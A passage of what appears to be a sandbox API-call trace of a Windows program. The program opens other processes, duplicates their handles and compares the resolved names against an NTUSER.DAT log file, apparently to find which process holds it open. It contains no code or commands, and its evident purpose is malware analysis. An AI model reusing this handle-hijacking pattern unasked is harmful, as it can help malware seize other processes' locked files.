dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.068] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.069] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.069] CloseHandle (hObject=0x670) returned 1 [0153.069] CloseHandle (hObject=0x680) returned 1 [0153.069] CloseHandle (hObject=0x62c) returned 1 [0153.069] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.069] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.070] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.070] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.071] CloseHandle (hObject=0x670) returned 1 [0153.071] CloseHandle (hObject=0x680) returned 1 [0153.071] CloseHandle (hObject=0x62c) returned 1 [0153.071] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0153.071] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.071] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.073] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.073] CloseHandle (hObject=0x670) returned 1 [0153.073] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0153.073] CloseHandle (hObject=0x680) returned 1 [0153.073] CloseHandle (hObject=0x62c) returned 1 [0153.073] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.073] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.074] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.074] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.074] CloseHandle (hObject=0x670) returned 1 [0153.074] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.074] CloseHandle (hObject=0x680) returned 1 [0153.074] CloseHandle (hObject=0x62c) returned 1 [0153.075] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.075] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.075] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.076] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.076] CloseHandle (hObject=0x670) returned 1 [0153.076] CloseHandle (hObject=0x680) returned 1 [0153.076] CloseHandle (hObject=0x62c) returned 1 [0153.076] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.076] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.076] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.077] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.077] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.077] CloseHandle (hObject=0x670) returned 1 [0153.077] CloseHandle (hObject=0x680) returned 1 [0153.078] CloseHandle (hObject=0x62c) returned 1 [0153.078] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.078] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.078] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.078] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.079] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.079] CloseHandle (hObject=0x670) returned 1 [0153.079] CloseHandle (hObject=0x680) returned 1 [0153.079] CloseHandle (hObject=0x62c) returned 1 [0153.079] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.079] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.079] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.080] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.081] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.081] CloseHandle (hObject=0x670) returned 1 [0153.081] CloseHandle (hObject=0x680) returned 1 [0153.081] CloseHandle (hObject=0x62c) returned 1 [0153.081] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.081] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.082] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.083] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.083] CloseHandle (hObject=0x670) returned 1 [0153.083] CloseHandle (hObject=0x680) returned 1 [0153.083] CloseHandle (hObject=0x62c) returned 1 [0153.083] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.083] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.083] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.084] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.085] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.085] CloseHandle (hObject=0x670) returned 1 [0153.085] CloseHandle (hObject=0x680) returned 1 [0153.085] CloseHandle (hObject=0x62c) returned 1 [0153.085] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.085] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.086] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.087] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.087] CloseHandle (hObject=0x670) returned 1 [0153.087] CloseHandle (hObject=0x680) returned 1 [0153.087] CloseHandle (hObject=0x62c) returned 1 [0153.087] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.087] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.088] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.088] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.088] CloseHandle (hObject=0x670) returned 1 [0153.088] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -8 [0153.088] CloseHandle (hObject=0x680) returned 1 [0153.089] CloseHandle (hObject=0x62c) returned 1 [0153.089] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.089] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.089] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.090] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.090] CloseHandle (hObject=0x670) returned 1 [0153.090] CloseHandle (hObject=0x680) returned 1 [0153.090] CloseHandle (hObject=0x62c) returned 1 [0153.090] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.090] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x260, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.090] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.091] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.091] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.091] CloseHandle (hObject=0x670) returned 1 [0153.092] CloseHandle (hObject=0x680) returned 1 [0153.092] CloseHandle (hObject=0x62c) returned 1 [0153.092] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0153.092] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.092] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.093] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.093] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.093] CloseHandle (hObject=0x670) returned 1 [0153.093] CloseHandle (hObject=0x680) returned 1 [0153.093] CloseHandle (hObject=0x62c) returned 1 [0153.093] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0153.093] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.093] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.095] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.095] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.095] CloseHandle (hObject=0x670) returned 1 [0153.095] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.095] CloseHandle (hObject=0x680) returned 1 [0153.095] CloseHandle (hObject=0x62c) returned 1 [0153.096] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0153.096] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.096] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.097] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.097] CloseHandle (hObject=0x670) returned 1 [0153.097] CloseHandle (hObject=0x680) returned 1 [0153.097] CloseHandle (hObject=0x62c) returned 1 [0153.097] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0153.097] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.097] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.098] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.099] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.099] CloseHandle (hObject=0x670) returned 1 [0153.099] CloseHandle (hObject=0x680) returned 1 [0153.099] CloseHandle (hObject=0x62c) returned 1 [0153.099] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0153.099] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.100] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.100] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.100] CloseHandle (hObject=0x670) returned 1 [0153.101] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0153.101] CloseHandle (hObject=0x680) returned 1 [0153.101] CloseHandle (hObject=0x62c) returned 1 [0153.101] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4c8) returned 0x62c [0153.101] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x238, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.101] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.102] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.103] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.103] CloseHandle (hObject=0x670) returned 1 [0153.103] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.103] CloseHandle (hObject=0x680) returned 1 [0153.103] CloseHandle (hObject=0x62c) returned 1 [0153.103] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x62c [0153.103] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.104] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.105] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.105] CloseHandle (hObject=0x670) returned 1 [0153.105] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.105] CloseHandle (hObject=0x680) returned 1 [0153.105] CloseHandle (hObject=0x62c) returned 1 [0153.105] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x588) returned 0x62c [0153.105] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x68, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.106] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.106] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.107] CloseHandle (hObject=0x670) returned 1 [0153.107] CloseHandle (hObject=0x680) returned 1 [0153.107] CloseHandle (hObject=0x62c) returned 1 [0153.107] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x32c) returned 0x62c [0153.107] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.107] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.108] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.108] CloseHandle (hObject=0x670) returned 1 [0153.108] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.108] CloseHandle (hObject=0x680) returned 1 [0153.108] CloseHandle (hObject=0x62c) returned 1 [0153.108] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x32c) returned 0x62c [0153.108] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.109] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.110] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.110] CloseHandle (hObject=0x670) returned 1 [0153.110] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.110] CloseHandle (hObject=0x680) returned 1 [0153.110] CloseHandle (hObject=0x62c) returned 1 [0153.110] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6a4) returned 0x62c [0153.110] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.111] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.112] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.112] CloseHandle (hObject=0x670) returned 1 [0153.112] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.112] CloseHandle (hObject=0x680) returned 1 [0153.112] CloseHandle (hObject=0x62c) returned 1 [0153.112] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6a4) returned 0x62c [0153.112] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.112] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.113] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.114] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.114] CloseHandle (hObject=0x670) returned 1 [0153.114] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0153.114] CloseHandle (hObject=0x680) returned 1 [0153.114] CloseHandle (hObject=0x62c) returned 1 [0153.114] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x62c [0153.114] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.115] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.115] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.116] CloseHandle (hObject=0x670) returned 1 [0153.116] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.116] CloseHandle (hObject=0x680) returned 1 [0153.116] CloseHandle (hObject=0x62c) returned 1 [0153.116] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x62c [0153.116] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.116] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.117] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.117] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.117] CloseHandle (hObject=0x670) returned 1 [0153.117] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0153.117] CloseHandle (hObject=0x680) returned 1 [0153.117] CloseHandle (hObject=0x62c) returned 1 [0153.117] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x62c [0153.117] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, 